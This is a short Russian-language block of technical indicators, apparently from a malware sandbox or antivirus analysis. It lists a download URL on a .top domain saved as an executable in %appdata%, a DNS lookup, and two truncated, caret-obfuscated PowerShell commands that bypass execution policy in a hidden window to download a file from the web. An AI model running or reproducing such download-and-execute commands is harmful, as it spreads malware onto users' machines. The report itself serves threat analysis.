Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^Rs^hE^ll^.^exe^ -EX^ecu^t^iON^p^oLICY bYp^A^SS^ -N^opROf^i^LE^ -W^In^doW^StYl^E HiDD^EN^ (^N^e^w-O^B^j^eCt ^sYS^TeM.^n^E^t.wE^Bcl^i^ent)^.dO^w^Nl^oA^d^fiL^E('http://...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^Rs^hE^ll^.^exe^ -EX^ecu^t^iON^p^oLICY bYp^A^SS^ -N^opROf^i^LE^ -W^In^doW^StYl^E HiDD^EN^ (^N^e^w-O^B^j^eCt ^sYS^TeM.^n^E^t.wE^Bcl^i^ent)^.dO^w^Nl^oA^d^fiL^E('http://...' (со скрытым окном)